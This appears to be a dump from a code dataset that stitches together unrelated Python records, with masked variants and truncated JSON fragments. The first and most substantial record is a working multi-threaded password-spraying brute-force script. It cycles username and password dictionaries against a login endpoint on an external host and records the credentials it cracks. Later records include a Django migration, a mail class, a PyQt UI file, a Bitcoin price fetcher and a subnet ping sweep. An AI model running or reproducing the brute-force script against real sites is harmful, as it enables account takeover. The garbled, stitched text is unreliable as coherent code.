dict_password = args.get('dict_password', 'password.txt')\n for curr_round in range(0, MAX_ROUND):\n print('[INFO] 开始第{0}轮爆破'.format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print('[INFO] Sleep.')\n sleep(2)\n print_result()\n",
"step-5": "import argparse\nimport requests\n\nfrom ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username\n\nfrom random import choice\nfrom time import sleep\n\n\nMAX_ROUND = 3 # 爆破的轮数\ncurr_round = 0 # 当前的轮数\nsleep_time = 2 # 每一轮休眠的秒数\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print(\"[Error] {0}\".format(repr(e)))\n return\n\n username = login_info[0]\n # 如果这个用户名已经被爆破出来密码,那么跳过这个用户名\n if username in success_username:\n return\n\n password = login_info[1]\n # 登录\n payload = {\n \"username\": username,\n \"password\": password,\n }\n print('开始尝试用户名:{},密码:{}'.format(username,password))\n\n # url = \"http://127.0.0.1:8000/user/login-block-account/?referer=/\"\n url = \"http://ss.gentlecp.com:40000/user/login-block-account/?referer=/\"\n r = requests.post(url, data=payload)\n\n # 判断是否登录成功\n if r.status_code == 200:\n msg = login_info\n\n success_str = \"欢迎访问GentleCP的网站\"\n if success_str in r.text:\n # 登录成功则把登录信息保存到success_queue\n success_queue.put(msg)\n # 把登录成功的用户名添加到 success_username中,之后可以跳过这个用户名的密码的爆破\n success_username.append(username)\n print(\"[INFO] success: \", msg)\n\n # 如果想要爆破出来一个密码就立刻停止爆破,那么此处调用函数stop_brute,反之则注释此处\n # stop_brute()\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open(\"dict/{}\".format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n\n count = 0\n for u in username:\n # 每一轮都换下一个密码\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = (u, p)\n dict_queue.put(pair)\n print(\"字典生成完成,长度 {}\".format(count))\n\n\ndef get_parse() -> dict:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--username\", \"-u\", help=\"用户名字典\")\n parser.add_argument(\"--password\", \"-p\", help=\"密码字典\")\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print(\"\\n[INFO] 爆破结果: \", success)\n\n\nif __name__ == \"__main__\":\n args = get_parse()\n dict_username = args.get('dict_username', \"username.txt\")\n dict_password = args.get('dict_password', \"password.txt\")\n\n for curr_round in range(0, MAX_ROUND):\n print(\"[INFO] 开始第{0}轮爆破\".format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print(\"[INFO] Sleep.\")\n sleep(2)\n\n print_result()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
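The round-based password selection in get_dict above amounts to password spraying: within one round every username is tried against the same single password, which keeps the per-account attempt count low. A minimal sketch of just that pairing logic, with hypothetical word lists and without the queue/threading machinery:

usernames = ["alice", "bob", "carol"]          # hypothetical username list
passwords = ["123456", "password", "qwerty"]   # hypothetical password list

MAX_ROUND = 3
for curr_round in range(MAX_ROUND):
    p = passwords[curr_round % len(passwords)]  # one password per round
    pairs = [(u, p) for u in usernames]
    print("round", curr_round, pairs)
# Round 0 pairs every user with "123456", round 1 with "password", and so on.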
# Generated by Django 3.0.3 on 2020-02-09 06:29
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('devices_collect', '0004_auto_20200209_1304'),
]
operations = [
migrations.AlterField(
model_name='collectdevices',
name='generated_time',
field=models.DateTimeField(default=datetime.datetime(2020, 2, 9, 6, 28, 34, 547300, tzinfo=utc)),
),
]
|
flexible
|
{
"blob_id": "b07d042c61e9e6647822989444e72db2e01c64d0",
"index": 5751,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('devices_collect', '0004_auto_20200209_1304')]\n operations = [migrations.AlterField(model_name='collectdevices', name=\n 'generated_time', field=models.DateTimeField(default=datetime.\n datetime(2020, 2, 9, 6, 28, 34, 547300, tzinfo=utc)))]\n",
"step-4": "import datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n dependencies = [('devices_collect', '0004_auto_20200209_1304')]\n operations = [migrations.AlterField(model_name='collectdevices', name=\n 'generated_time', field=models.DateTimeField(default=datetime.\n datetime(2020, 2, 9, 6, 28, 34, 547300, tzinfo=utc)))]\n",
"step-5": "# Generated by Django 3.0.3 on 2020-02-09 06:29\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('devices_collect', '0004_auto_20200209_1304'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='collectdevices',\n name='generated_time',\n field=models.DateTimeField(default=datetime.datetime(2020, 2, 9, 6, 28, 34, 547300, tzinfo=utc)),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
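The AlterField above bakes a fixed timestamp into the default, which is what makemigrations emits when a DateTimeField default was evaluated at generation time. If the intent is "time of row creation", the model would normally pass a callable instead; a hedged model-side sketch (the class name CollectDevices is assumed from model_name='collectdevices'):

from django.db import models
from django.utils import timezone


class CollectDevices(models.Model):
    # Passing the callable (no parentheses) evaluates timezone.now at save time
    # instead of freezing the moment the migration was generated.
    generated_time = models.DateTimeField(default=timezone.now)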
import uvicore
from uvicore.support import module
from uvicore.typing import Dict, List
from uvicore.support.dumper import dump, dd
from uvicore.contracts import Email
@uvicore.service()
class Mail:
def __init__(self, *,
mailer: str = None,
mailer_options: Dict = None,
to: List = [],
cc: List = [],
bcc: List = [],
from_name: str = None,
from_address: str = None,
subject: str = None,
html: str = None,
text: str = None,
attachments: List = [],
) -> None:
# Get mailer and options from config
self._config = uvicore.config.app.mail.clone()
self._mailer = mailer or self._config.default
self._mailer_options = self._config.mailers[self._mailer].clone().merge(mailer_options)
# New message superdict
self._message: Email = Email()
self._message.to = to
self._message.cc = cc
self._message.bcc = bcc
self._message.from_name = from_name or self._config.from_name
self._message.from_address = from_address or self._config.from_address
self._message.subject = subject
self._message.html = html
self._message.text = text
self._message.attachments = attachments
def mailer(self, mailer: str):
self._mailer = mailer
self._mailer_options = self._config.mailers[self._mailer].clone()
return self
def mailer_options(self, options: Dict):
self._mailer_options.merge(Dict(options))
return self
def to(self, to: List):
self._message.to = to
return self
def cc(self, cc: List):
self._message.cc = cc
return self
def bcc(self, bcc: List):
self._message.bcc = bcc
return self
def from_name(self, from_name: str):
self._message.from_name = from_name
return self
def from_address(self, from_address: str):
self._message.from_address = from_address
return self
def subject(self, subject: str):
self._message.subject = subject
return self
def html(self, html: str):
self._message.html = html
return self
def text(self, text: str):
self._message.text = text
return self
def attachments(self, attachments: List):
self._message.attachments = attachments
return self
async def send(self):
# Use dynamic module based on mailer driver
driver = module.load(self._mailer_options.driver).object
await driver.send(self._message, self._mailer_options)
|
flexible
|
{
"blob_id": "c87ede0e3c6d4cc305450f68b4cf61fb63986760",
"index": 8676,
"step-1": "<mask token>\n\n\[email protected]()\nclass Mail:\n\n def __init__(self, *, mailer: str=None, mailer_options: Dict=None, to:\n List=[], cc: List=[], bcc: List=[], from_name: str=None,\n from_address: str=None, subject: str=None, html: str=None, text:\n str=None, attachments: List=[]) ->None:\n self._config = uvicore.config.app.mail.clone()\n self._mailer = mailer or self._config.default\n self._mailer_options = self._config.mailers[self._mailer].clone(\n ).merge(mailer_options)\n self._message: Email = Email()\n self._message.to = to\n self._message.cc = cc\n self._message.bcc = bcc\n self._message.from_name = from_name or self._config.from_name\n self._message.from_address = from_address or self._config.from_address\n self._message.subject = subject\n self._message.html = html\n self._message.text = text\n self._message.attachments = attachments\n\n def mailer(self, mailer: str):\n self._mailer = mailer\n self._mailer_options = self._config.mailers[self._mailer].clone()\n return self\n <mask token>\n\n def to(self, to: List):\n self._message.to = to\n return self\n\n def cc(self, cc: List):\n self._message.cc = cc\n return self\n <mask token>\n\n def from_name(self, from_name: str):\n self._message.from_name = from_name\n return self\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n async def send(self):\n driver = module.load(self._mailer_options.driver).object\n await driver.send(self._message, self._mailer_options)\n",
"step-2": "<mask token>\n\n\[email protected]()\nclass Mail:\n\n def __init__(self, *, mailer: str=None, mailer_options: Dict=None, to:\n List=[], cc: List=[], bcc: List=[], from_name: str=None,\n from_address: str=None, subject: str=None, html: str=None, text:\n str=None, attachments: List=[]) ->None:\n self._config = uvicore.config.app.mail.clone()\n self._mailer = mailer or self._config.default\n self._mailer_options = self._config.mailers[self._mailer].clone(\n ).merge(mailer_options)\n self._message: Email = Email()\n self._message.to = to\n self._message.cc = cc\n self._message.bcc = bcc\n self._message.from_name = from_name or self._config.from_name\n self._message.from_address = from_address or self._config.from_address\n self._message.subject = subject\n self._message.html = html\n self._message.text = text\n self._message.attachments = attachments\n\n def mailer(self, mailer: str):\n self._mailer = mailer\n self._mailer_options = self._config.mailers[self._mailer].clone()\n return self\n <mask token>\n\n def to(self, to: List):\n self._message.to = to\n return self\n\n def cc(self, cc: List):\n self._message.cc = cc\n return self\n <mask token>\n\n def from_name(self, from_name: str):\n self._message.from_name = from_name\n return self\n <mask token>\n <mask token>\n\n def html(self, html: str):\n self._message.html = html\n return self\n <mask token>\n\n def attachments(self, attachments: List):\n self._message.attachments = attachments\n return self\n\n async def send(self):\n driver = module.load(self._mailer_options.driver).object\n await driver.send(self._message, self._mailer_options)\n",
"step-3": "<mask token>\n\n\[email protected]()\nclass Mail:\n\n def __init__(self, *, mailer: str=None, mailer_options: Dict=None, to:\n List=[], cc: List=[], bcc: List=[], from_name: str=None,\n from_address: str=None, subject: str=None, html: str=None, text:\n str=None, attachments: List=[]) ->None:\n self._config = uvicore.config.app.mail.clone()\n self._mailer = mailer or self._config.default\n self._mailer_options = self._config.mailers[self._mailer].clone(\n ).merge(mailer_options)\n self._message: Email = Email()\n self._message.to = to\n self._message.cc = cc\n self._message.bcc = bcc\n self._message.from_name = from_name or self._config.from_name\n self._message.from_address = from_address or self._config.from_address\n self._message.subject = subject\n self._message.html = html\n self._message.text = text\n self._message.attachments = attachments\n\n def mailer(self, mailer: str):\n self._mailer = mailer\n self._mailer_options = self._config.mailers[self._mailer].clone()\n return self\n <mask token>\n\n def to(self, to: List):\n self._message.to = to\n return self\n\n def cc(self, cc: List):\n self._message.cc = cc\n return self\n\n def bcc(self, bcc: List):\n self._message.bcc = bcc\n return self\n\n def from_name(self, from_name: str):\n self._message.from_name = from_name\n return self\n <mask token>\n <mask token>\n\n def html(self, html: str):\n self._message.html = html\n return self\n <mask token>\n\n def attachments(self, attachments: List):\n self._message.attachments = attachments\n return self\n\n async def send(self):\n driver = module.load(self._mailer_options.driver).object\n await driver.send(self._message, self._mailer_options)\n",
"step-4": "<mask token>\n\n\[email protected]()\nclass Mail:\n\n def __init__(self, *, mailer: str=None, mailer_options: Dict=None, to:\n List=[], cc: List=[], bcc: List=[], from_name: str=None,\n from_address: str=None, subject: str=None, html: str=None, text:\n str=None, attachments: List=[]) ->None:\n self._config = uvicore.config.app.mail.clone()\n self._mailer = mailer or self._config.default\n self._mailer_options = self._config.mailers[self._mailer].clone(\n ).merge(mailer_options)\n self._message: Email = Email()\n self._message.to = to\n self._message.cc = cc\n self._message.bcc = bcc\n self._message.from_name = from_name or self._config.from_name\n self._message.from_address = from_address or self._config.from_address\n self._message.subject = subject\n self._message.html = html\n self._message.text = text\n self._message.attachments = attachments\n\n def mailer(self, mailer: str):\n self._mailer = mailer\n self._mailer_options = self._config.mailers[self._mailer].clone()\n return self\n\n def mailer_options(self, options: Dict):\n self._mailer_options.merge(Dict(options))\n return self\n\n def to(self, to: List):\n self._message.to = to\n return self\n\n def cc(self, cc: List):\n self._message.cc = cc\n return self\n\n def bcc(self, bcc: List):\n self._message.bcc = bcc\n return self\n\n def from_name(self, from_name: str):\n self._message.from_name = from_name\n return self\n <mask token>\n <mask token>\n\n def html(self, html: str):\n self._message.html = html\n return self\n <mask token>\n\n def attachments(self, attachments: List):\n self._message.attachments = attachments\n return self\n\n async def send(self):\n driver = module.load(self._mailer_options.driver).object\n await driver.send(self._message, self._mailer_options)\n",
"step-5": "import uvicore\nfrom uvicore.support import module\nfrom uvicore.typing import Dict, List\nfrom uvicore.support.dumper import dump, dd\nfrom uvicore.contracts import Email\n\n\[email protected]()\nclass Mail:\n\n def __init__(self, *,\n mailer: str = None,\n mailer_options: Dict = None,\n to: List = [],\n cc: List = [],\n bcc: List = [],\n from_name: str = None,\n from_address: str = None,\n subject: str = None,\n html: str = None,\n text: str = None,\n attachments: List = [],\n ) -> None:\n # Get mailer and options from config\n self._config = uvicore.config.app.mail.clone()\n self._mailer = mailer or self._config.default\n self._mailer_options = self._config.mailers[self._mailer].clone().merge(mailer_options)\n\n # New message superdict\n self._message: Email = Email()\n self._message.to = to\n self._message.cc = cc\n self._message.bcc = bcc\n self._message.from_name = from_name or self._config.from_name\n self._message.from_address = from_address or self._config.from_address\n self._message.subject = subject\n self._message.html = html\n self._message.text = text\n self._message.attachments = attachments\n\n def mailer(self, mailer: str):\n self._mailer = mailer\n self._mailer_options = self._config.mailers[self._mailer].clone()\n return self\n\n def mailer_options(self, options: Dict):\n self._mailer_options.merge(Dict(options))\n return self\n\n def to(self, to: List):\n self._message.to = to\n return self\n\n def cc(self, cc: List):\n self._message.cc = cc\n return self\n\n def bcc(self, bcc: List):\n self._message.bcc = bcc\n return self\n\n def from_name(self, from_name: str):\n self._message.from_name = from_name\n return self\n\n def from_address(self, from_address: str):\n self._message.from_address = from_address\n return self\n\n def subject(self, subject: str):\n self._message.subject = subject\n return self\n\n def html(self, html: str):\n self._message.html = html\n return self\n\n def text(self, text: str):\n self._message.text = text\n return self\n\n def attachments(self, attachments: List):\n self._message.attachments = attachments\n return self\n\n async def send(self):\n # Use dynamic module based on mailer driver\n driver = module.load(self._mailer_options.driver).object\n await driver.send(self._message, self._mailer_options)\n",
"step-ids": [
6,
8,
9,
10,
15
]
}
|
[
6,
8,
9,
10,
15
] |
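Every setter on the Mail class above returns self and send() is a coroutine, so the class reads as a fluent builder. A minimal usage sketch, assuming a bootstrapped uvicore app whose mail config defines a mailer named 'smtp' (the mailer key, addresses, and body are illustrative only):

import asyncio


async def notify():
    await (
        Mail()
        .mailer('smtp')                      # assumed mailer key in the app config
        .to(['[email protected]'])
        .from_address('[email protected]')
        .subject('Nightly report')
        .html('<p>All jobs finished.</p>')
        .send()
    )

# For a standalone illustration; inside a running uvicore app you would already
# be on an event loop and simply await notify().
asyncio.run(notify())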
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mapGraph.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MapGraphTab(object):
def setupUi(self, MapGraphTab):
MapGraphTab.setObjectName("MapGraphTab")
MapGraphTab.resize(1150, 831)
MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))
MapGraphTab.setStyleSheet("background-color: rgb(255, 96, 117);")
self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)
self.gridLayout.setObjectName("gridLayout")
self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)
self.mapView.setUrl(QtCore.QUrl("about:blank"))
self.mapView.setObjectName("mapView")
self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)
self.label = QtWidgets.QLabel(MapGraphTab)
self.label.setMinimumSize(QtCore.QSize(1050, 0))
font = QtGui.QFont()
font.setFamily("Book Antiqua")
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 2)
self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)
font = QtGui.QFont()
font.setFamily("Book Antiqua")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.extractrMapBtn.setFont(font)
self.extractrMapBtn.setStyleSheet("background-color: rgb(255, 255, 255);")
self.extractrMapBtn.setObjectName("extractrMapBtn")
self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)
self.retranslateUi(MapGraphTab)
QtCore.QMetaObject.connectSlotsByName(MapGraphTab)
def retranslateUi(self, MapGraphTab):
_translate = QtCore.QCoreApplication.translate
MapGraphTab.setWindowTitle(_translate("MapGraphTab", "Map Graph"))
self.label.setText(_translate("MapGraphTab", "Map Graph"))
self.extractrMapBtn.setText(_translate("MapGraphTab", "Extract Video"))
from PyQt5 import QtWebEngineWidgets
|
flexible
|
{
"blob_id": "03a13037a9a102397c8be4d9f0f4c5e150965808",
"index": 8666,
"step-1": "<mask token>\n\n\nclass Ui_MapGraphTab(object):\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Ui_MapGraphTab(object):\n\n def setupUi(self, MapGraphTab):\n MapGraphTab.setObjectName('MapGraphTab')\n MapGraphTab.resize(1150, 831)\n MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))\n MapGraphTab.setStyleSheet('background-color: rgb(255, 96, 117);')\n self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)\n self.gridLayout.setObjectName('gridLayout')\n self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)\n self.mapView.setUrl(QtCore.QUrl('about:blank'))\n self.mapView.setObjectName('mapView')\n self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)\n self.label = QtWidgets.QLabel(MapGraphTab)\n self.label.setMinimumSize(QtCore.QSize(1050, 0))\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName('label')\n self.gridLayout.addWidget(self.label, 0, 0, 1, 2)\n self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.extractrMapBtn.setFont(font)\n self.extractrMapBtn.setStyleSheet(\n 'background-color: rgb(255, 255, 255);')\n self.extractrMapBtn.setObjectName('extractrMapBtn')\n self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)\n self.retranslateUi(MapGraphTab)\n QtCore.QMetaObject.connectSlotsByName(MapGraphTab)\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Ui_MapGraphTab(object):\n\n def setupUi(self, MapGraphTab):\n MapGraphTab.setObjectName('MapGraphTab')\n MapGraphTab.resize(1150, 831)\n MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))\n MapGraphTab.setStyleSheet('background-color: rgb(255, 96, 117);')\n self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)\n self.gridLayout.setObjectName('gridLayout')\n self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)\n self.mapView.setUrl(QtCore.QUrl('about:blank'))\n self.mapView.setObjectName('mapView')\n self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)\n self.label = QtWidgets.QLabel(MapGraphTab)\n self.label.setMinimumSize(QtCore.QSize(1050, 0))\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName('label')\n self.gridLayout.addWidget(self.label, 0, 0, 1, 2)\n self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.extractrMapBtn.setFont(font)\n self.extractrMapBtn.setStyleSheet(\n 'background-color: rgb(255, 255, 255);')\n self.extractrMapBtn.setObjectName('extractrMapBtn')\n self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)\n self.retranslateUi(MapGraphTab)\n QtCore.QMetaObject.connectSlotsByName(MapGraphTab)\n\n def retranslateUi(self, MapGraphTab):\n _translate = QtCore.QCoreApplication.translate\n MapGraphTab.setWindowTitle(_translate('MapGraphTab', 'Map Graph'))\n self.label.setText(_translate('MapGraphTab', 'Map Graph'))\n self.extractrMapBtn.setText(_translate('MapGraphTab', 'Extract Video'))\n\n\n<mask token>\n",
"step-4": "from PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_MapGraphTab(object):\n\n def setupUi(self, MapGraphTab):\n MapGraphTab.setObjectName('MapGraphTab')\n MapGraphTab.resize(1150, 831)\n MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))\n MapGraphTab.setStyleSheet('background-color: rgb(255, 96, 117);')\n self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)\n self.gridLayout.setObjectName('gridLayout')\n self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)\n self.mapView.setUrl(QtCore.QUrl('about:blank'))\n self.mapView.setObjectName('mapView')\n self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)\n self.label = QtWidgets.QLabel(MapGraphTab)\n self.label.setMinimumSize(QtCore.QSize(1050, 0))\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName('label')\n self.gridLayout.addWidget(self.label, 0, 0, 1, 2)\n self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.extractrMapBtn.setFont(font)\n self.extractrMapBtn.setStyleSheet(\n 'background-color: rgb(255, 255, 255);')\n self.extractrMapBtn.setObjectName('extractrMapBtn')\n self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)\n self.retranslateUi(MapGraphTab)\n QtCore.QMetaObject.connectSlotsByName(MapGraphTab)\n\n def retranslateUi(self, MapGraphTab):\n _translate = QtCore.QCoreApplication.translate\n MapGraphTab.setWindowTitle(_translate('MapGraphTab', 'Map Graph'))\n self.label.setText(_translate('MapGraphTab', 'Map Graph'))\n self.extractrMapBtn.setText(_translate('MapGraphTab', 'Extract Video'))\n\n\nfrom PyQt5 import QtWebEngineWidgets\n",
"step-5": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'mapGraph.ui'\n#\n# Created by: PyQt5 UI code generator 5.9.2\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_MapGraphTab(object):\n def setupUi(self, MapGraphTab):\n MapGraphTab.setObjectName(\"MapGraphTab\")\n MapGraphTab.resize(1150, 831)\n MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))\n MapGraphTab.setStyleSheet(\"background-color: rgb(255, 96, 117);\")\n self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)\n self.mapView.setUrl(QtCore.QUrl(\"about:blank\"))\n self.mapView.setObjectName(\"mapView\")\n self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)\n self.label = QtWidgets.QLabel(MapGraphTab)\n self.label.setMinimumSize(QtCore.QSize(1050, 0))\n font = QtGui.QFont()\n font.setFamily(\"Book Antiqua\")\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName(\"label\")\n self.gridLayout.addWidget(self.label, 0, 0, 1, 2)\n self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)\n font = QtGui.QFont()\n font.setFamily(\"Book Antiqua\")\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.extractrMapBtn.setFont(font)\n self.extractrMapBtn.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.extractrMapBtn.setObjectName(\"extractrMapBtn\")\n self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)\n\n self.retranslateUi(MapGraphTab)\n QtCore.QMetaObject.connectSlotsByName(MapGraphTab)\n\n def retranslateUi(self, MapGraphTab):\n _translate = QtCore.QCoreApplication.translate\n MapGraphTab.setWindowTitle(_translate(\"MapGraphTab\", \"Map Graph\"))\n self.label.setText(_translate(\"MapGraphTab\", \"Map Graph\"))\n self.extractrMapBtn.setText(_translate(\"MapGraphTab\", \"Extract Video\"))\n\nfrom PyQt5 import QtWebEngineWidgets\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
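The generated Ui_MapGraphTab class above is applied to a plain widget rather than subclassed. A minimal wiring sketch (the module name in the import is hypothetical; note that QtWebEngineWidgets must be imported before the QApplication is created, which the module-level import at the bottom of the generated file takes care of):

import sys
from PyQt5 import QtWidgets
# from mapGraph_ui import Ui_MapGraphTab  # hypothetical module name for the generated file


def main():
    app = QtWidgets.QApplication(sys.argv)
    tab = QtWidgets.QWidget()
    ui = Ui_MapGraphTab()
    ui.setupUi(tab)   # builds the web view, label and button
    ui.extractrMapBtn.clicked.connect(lambda: print("extract clicked"))  # hypothetical handler
    tab.show()
    sys.exit(app.exec_())


main()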
a = 'Hello, World!'
print
|
flexible
|
{
"blob_id": "b779cfc6d6456a370092bf1cfa5904c869b7466a",
"index": 9219,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint\n",
"step-3": "a = 'Hello, World!'\nprint\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import json
import requests
class Bitcoin:
coindesk = 'https://api.coindesk.com/v1/bpi/currentprice.json'
def __init__(self):
pass
def get_current_price(self, url=coindesk):
self.resp = requests.get(url)
if self.resp.status_code == 200:
return json.loads(self.resp.content.decode('utf-8'))
else:
return None
def float_price(self, json_response):
if json_response is not None:
rate = json_response['bpi']['EUR']['rate_float']
try:
return float(rate)
except:
return None
else:
return None
|
normal
|
{
"blob_id": "3bfe4021d5cf9bd24c0fb778b252bc04c6ac47ed",
"index": 1847,
"step-1": "<mask token>\n\n\nclass Bitcoin:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Bitcoin:\n <mask token>\n\n def __init__(self):\n pass\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Bitcoin:\n <mask token>\n\n def __init__(self):\n pass\n\n def get_current_price(self, url=coindesk):\n self.resp = requests.get(url)\n if self.resp.status_code == 200:\n return json.loads(self.resp.content.decode('utf-8'))\n else:\n return None\n\n def float_price(self, json_response):\n if json_response is not None:\n rate = json_response['bpi']['EUR']['rate_float']\n try:\n return float(rate)\n except:\n return None\n else:\n return None\n",
"step-4": "<mask token>\n\n\nclass Bitcoin:\n coindesk = 'https://api.coindesk.com/v1/bpi/currentprice.json'\n\n def __init__(self):\n pass\n\n def get_current_price(self, url=coindesk):\n self.resp = requests.get(url)\n if self.resp.status_code == 200:\n return json.loads(self.resp.content.decode('utf-8'))\n else:\n return None\n\n def float_price(self, json_response):\n if json_response is not None:\n rate = json_response['bpi']['EUR']['rate_float']\n try:\n return float(rate)\n except:\n return None\n else:\n return None\n",
"step-5": "import json\nimport requests\n\n\nclass Bitcoin:\n coindesk = 'https://api.coindesk.com/v1/bpi/currentprice.json'\n\n def __init__(self):\n pass\n\n def get_current_price(self, url=coindesk):\n self.resp = requests.get(url)\n if self.resp.status_code == 200:\n return json.loads(self.resp.content.decode('utf-8'))\n else:\n return None\n\n def float_price(self, json_response):\n if json_response is not None:\n rate = json_response['bpi']['EUR']['rate_float']\n try:\n return float(rate)\n except:\n return None\n else:\n return None\n",
"step-ids": [
1,
2,
4,
5,
6
]
}
|
[
1,
2,
4,
5,
6
] |
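A short usage sketch for the Bitcoin helper above (needs network access to the CoinDesk endpoint; float_price returns None when the request or parsing fails):

btc = Bitcoin()
data = btc.get_current_price()        # GET https://api.coindesk.com/v1/bpi/currentprice.json
price_eur = btc.float_price(data)
if price_eur is not None:
    print("1 BTC = {:.2f} EUR".format(price_eur))
else:
    print("price unavailable")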
import ipaddress
import subprocess
from subprocess import PIPE

ip_net = ipaddress.ip_network('192.168.0.100/30')
for i in ip_net.hosts():
    host_add = str(i)
    # '-n 3' is the Windows ping count flag; on Linux/macOS use '-c 3' instead.
    toping = subprocess.Popen(['ping', '-n', '3', host_add], stdout=PIPE)

    output = toping.communicate()[0]
    hostalive = toping.returncode
    if hostalive == 0:
        print(host_add, "is reachable")
    else:
        print(host_add, "is not reachable")
|
normal
|
{
"blob_id": "414fb437783fcfb55f542f072aaf3a8bb02b441e",
"index": 8275,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in ip_net.hosts():\n host_add = str(i)\n toping = subprocess.Popen(['ping', '-n', '3', host_add], stdout=PIPE)\n output = toping.communicate()[0]\n hostalive = toping.returncode\n if hostalive == 0:\n print(host_add, 'is reachable')\n else:\n print(host_add, 'is not reachable')\n",
